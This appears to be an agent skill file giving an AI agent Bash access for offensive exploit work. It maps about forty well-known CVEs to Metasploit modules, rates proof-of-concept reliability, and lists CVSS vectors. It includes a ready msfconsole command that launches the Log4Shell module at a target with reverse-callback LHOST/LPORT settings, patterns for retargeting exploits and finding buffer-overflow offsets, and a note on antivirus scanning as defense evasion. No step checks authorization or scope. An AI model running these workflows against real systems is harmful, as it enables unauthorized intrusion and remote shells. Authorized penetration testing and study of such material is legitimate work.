Exploit-DB and searchsploit reference — EDB→Metasploit module mappings, PoC reliability rubric, CVSS tier quick reference, and searchsploit usage patterns
Scanned 5/28/2026
---
name: exploit-db
description: Exploit-DB and searchsploit reference — EDB→Metasploit module mappings, PoC reliability rubric, CVSS tier quick reference, and searchsploit usage patterns
allowed-tools: Bash, Read
---
## searchsploit Usage Patterns
```bash
# Text search in title/path
searchsploit apache 2.4
# Search by CVE
searchsploit --cve CVE-2021-41773
searchsploit --cve CVE-2021-44228
# JSON output for scripting
searchsploit apache --json | python3 -c "
import sys, json
data = json.load(sys.stdin)
for e in data.get('RESULTS_EXPLOIT', []):
    print(e['EDB-ID'], e['Title'], e['Path'])
"
# Copy exploit to working dir
searchsploit -m 50383
# Update database
searchsploit -u
# Search by nmap XML output
searchsploit --nmap nmap_output.xml
# Restrict the search to exploit titles (-t); the result path shows the type (webapps, local, remote, dos)
searchsploit -t "remote" apache
# Search for specific OS
searchsploit windows 10 privilege escalation
# Show Exploit-DB URLs for the results instead of local paths
searchsploit -w wordpress
```
## EDB → Metasploit Module Mapping (Top 40 Vulnerabilities)
| CVE / EDB-ID | Vulnerability | Metasploit Module | Reliability |
|---|---|---|---|
| CVE-2017-0144 / EDB-41891 | MS17-010 EternalBlue | `exploit/windows/smb/ms17_010_eternalblue` | Weaponized |
| CVE-2021-44228 / EDB-50592 | Log4Shell RCE | `exploit/multi/http/log4shell_header_injection` | Weaponized |
| CVE-2021-1675 / EDB-50265 | PrintNightmare | `exploit/windows/dcerpc/cve_2021_1675_printnightmare` | Weaponized |
| CVE-2021-34473 / EDB-50243 | ProxyShell Exchange | `exploit/windows/http/exchange_proxyshell_rce` | Weaponized |
| CVE-2020-1472 / EDB-49071 | ZeroLogon | `auxiliary/admin/dcerpc/cve_2020_1472_zerologon` | Weaponized |
| CVE-2022-22965 / EDB-50798 | Spring4Shell | `exploit/multi/http/spring_framework_rce_spring4shell` | Weaponized |
| CVE-2019-19781 / EDB-47901 | Citrix ADC Path Traversal | `exploit/linux/http/citrix_dir_traversal_rce` | Weaponized |
| CVE-2020-5902 / EDB-48695 | F5 BIG-IP RCE | `exploit/linux/http/f5_bigip_tmui_rce` | Weaponized |
| CVE-2021-26855 / EDB-49637 | ProxyLogon Exchange | `exploit/windows/http/exchange_proxylogon_rce` | Weaponized |
| CVE-2022-26134 / EDB-51076 | Confluence OGNL RCE | `exploit/multi/http/atlassian_confluence_namespace_ognl_injection` | Weaponized |
| CVE-2018-13379 / EDB-47288 | FortiOS Path Traversal | `auxiliary/gather/fortios_vpn_user_cred` | Functional |
| CVE-2022-1388 / EDB-50919 | F5 iControl Auth Bypass | `exploit/linux/http/f5_icontrol_rce` | Weaponized |
| CVE-2021-20038 / EDB-50882 | SonicWall SMA Stack Overflow | `exploit/linux/http/sonicwall_sma_overflow` | Functional |
| CVE-2023-46604 / EDB-51880 | Apache ActiveMQ RCE | `exploit/multi/misc/apache_activemq_rce_cve_2023_46604` | Weaponized |
| CVE-2021-3156 / EDB-49521 | Sudo Baron Samedit | `exploit/linux/local/sudo_baron_samedit` | Weaponized |
| CVE-2021-4034 / EDB-50689 | PwnKit polkit LPE | `exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec` | Weaponized |
| CVE-2022-0847 / EDB-50808 | Dirty Pipe Linux LPE | `exploit/linux/local/cve_2022_0847_dirtypipe` | Weaponized |
| CVE-2016-5195 / EDB-40616 | Dirty COW Linux LPE | `exploit/linux/local/overlayfs_priv_esc` | Weaponized |
| CVE-2014-6271 / EDB-34766 | Shellshock Bash RCE | `exploit/multi/http/apache_mod_cgi_bash_env_exec` | Weaponized |
| CVE-2017-5638 / EDB-41570 | Apache Struts2 RCE | `exploit/multi/http/struts2_content_type_ognl` | Weaponized |
| CVE-2019-0708 / EDB-47416 | BlueKeep RDP RCE | `exploit/windows/rdp/cve_2019_0708_bluekeep_rce` | Functional |
| CVE-2020-0796 / EDB-48260 | SMBGhost RCE | `exploit/windows/smb/cve_2020_0796_smbghost` | Functional |
| CVE-2018-7600 / EDB-44449 | Drupalgeddon2 RCE | `exploit/unix/webapp/drupal_drupalgeddon2` | Weaponized |
| CVE-2019-0211 / EDB-46676 | Apache HTTPd LPE | `exploit/multi/http/apache_mod_cgi_bash_env_exec` | Functional |
| CVE-2015-1701 / EDB-37367 | Windows Win32k LPE | `exploit/windows/local/ms15_051_client_copy_image` | Weaponized |
| CVE-2020-14882 / EDB-49391 | Oracle WebLogic RCE | `exploit/multi/http/oracle_weblogic_admin_handle_rce` | Weaponized |
| CVE-2021-22005 / EDB-50513 | vCenter File Upload | `exploit/linux/http/vmware_vcenter_uploadova_rce` | Weaponized |
| CVE-2022-41040 / EDB-51917 | ProxyNotShell Exchange | `exploit/windows/http/exchange_proxynotshell_rce` | Functional |
| CVE-2023-22515 / EDB-51899 | Confluence Priv Esc | Manual PoC required | Functional |
| CVE-2024-21762 / EDB-51960 | FortiOS OOB Write | Manual PoC required | Weaponized |
| CVE-2019-11510 / EDB-47297 | Pulse Secure Arb File Read | `auxiliary/gather/pulse_secure_file_read` | Weaponized |
| CVE-2020-3452 / EDB-48577 | Cisco ASA Path Traversal | `auxiliary/gather/cisco_asa_local_file_inclusion` | Weaponized |
| CVE-2021-40539 / EDB-50781 | ManageEngine RCE | `exploit/multi/http/manageengine_adselfservice_plusrce` | Weaponized |
| CVE-2022-36537 / EDB-51327 | ZK Framework RCE | Manual PoC | Functional |
| CVE-2023-4966 / EDB-51888 | Citrix Bleed Session Leak | Manual PoC | Weaponized |
| CVE-2024-3400 / EDB-52023 | PAN-OS GlobalProtect RCE | Manual PoC | Weaponized |
| CVE-2022-47966 / EDB-51518 | ManageEngine SAML RCE | `exploit/linux/http/zoho_manageengine_saml_rce` | Weaponized |
| CVE-2023-27997 / EDB-51832 | FortiGate SSL-VPN Heap BOF | Manual PoC | Weaponized |
| CVE-2023-20198 / EDB-51873 | Cisco IOS XE Priv Esc | Manual PoC | Weaponized |
| CVE-2024-6387 / EDB-52098 | OpenSSH regreSSHion | Manual PoC (race) | DoS-only |
## PoC Reliability Rubric
| Level | Label | Criteria | Action |
|---|---|---|---|
| 1 | **Weaponized** | Works out-of-box against target version, produces shell/access reliably | Test directly; log as `CONFIRMED` |
| 2 | **Functional** | Requires minor adaptation (change URL, adjust offset) | Modify per target; log as `VERIFIED` |
| 3 | **DoS-only** | Crashes service but no code exec | Confirm version, log as `CONFIRMED-DOS` |
| 4 | **Theoretical** | Academic writeup, no working code | Write PoC from paper or skip |
| 5 | **False/Invalid** | Patched, misidentified, or wrong version | Log as `NOT-APPLICABLE` |
**Reliability Assessment Checklist:**
```
□ Check affected version range vs target version (confirm match)
□ Read comments/issues on GitHub PoC for known problems
□ Check EDB verified badge (green checkmark = tested by staff)
□ Note compile requirements (libc version, kernel headers, etc.)
□ Test in identical OS/service version lab before live target
□ Check VT multi-scanner on compiled binary (defense evasion consideration)
```
## CVSS 3.1 Tier Quick Reference
| Score | Severity | Vector Pattern | Examples |
|---|---|---|---|
| 9.0–10.0 | **CRITICAL** | `AV:N/AC:L/PR:N/UI:N/S:C` | Pre-auth RCE, unauthenticated critical |
| 7.0–8.9 | **HIGH** | `AV:N/AC:L/PR:N/UI:N` | Auth bypass, post-auth RCE, LPE |
| 4.0–6.9 | **MEDIUM** | `AV:N/AC:L/PR:L` or `AV:L/AC:L` | Auth required, info disclosure |
| 0.1–3.9 | **LOW** | `AV:L/AC:H/PR:H` | Physical access, complex conditions |
**Common Vector Components:**
```
AV: N(network) L(local) P(physical) A(adjacent)
AC: L(low) H(high)
PR: N(none) L(low) H(high)
UI: N(none) R(required)
S: U(unchanged) C(changed)
C/I/A: N(none) L(low) H(high)
```
**Pre-built CVSS Vectors by Category:**
```
Pre-auth RCE (critical): CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H = 9.8
Auth bypass + access: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N = 7.5
Post-auth RCE: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H = 8.8
Local privilege escalation: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H = 7.8
Stored XSS (admin): CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N = 5.4
SQLi (read-only): CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N = 6.5
SSRF (internal): CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N = 7.2
Path traversal (LFI): CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N = 7.5
DoS (network): CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H = 7.5
CSRF (state-change): CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N = 6.5
```
## searchsploit + Metasploit Workflow
```bash
# 1. Find relevant exploits
searchsploit --cve CVE-2021-44228 --json | python3 -m json.tool
# 2. View exploit details before downloading
searchsploit -x exploits/java/webapps/50592.py
# 3. Mirror to current directory
searchsploit -m 50592
# 4. Find matching MSF module
msfconsole -q -x "search cve:2021-44228; exit"
# 5. Run MSF module
msfconsole -q -x "
use exploit/multi/http/log4shell_header_injection
set RHOSTS $TARGET
set RPORT $PORT
set TARGETURI /
set LHOST $LHOST
set LPORT $LPORT
run
exit
"
```
## Common Exploit Modification Patterns
```python
# Pattern 1: Fix URL in raw exploit
import os
import re

TARGET = os.environ['TARGET']          # target host, supplied via the environment
code = open('exploit.py').read()
code = re.sub(r'http://[0-9.]+', f'http://{TARGET}', code)
open('exploit.py', 'w').write(code)    # write the adjusted copy back
# Pattern 2: Fix shell command in exploit
# Find LHOST/LPORT references and replace with env vars
LHOST = os.environ['LHOST']
LPORT = os.environ['LPORT']
# Pattern 3: Adjust buffer offset for target binary version
# Use a cyclic pattern to find the EIP/RIP offset (run from a shell; the pwntools module is `pwn`):
#   python3 -c "from pwn import *; print(cyclic(200).decode())" | ./$BINARY
# Then check the crash offset with: cyclic_find(b'faab')
```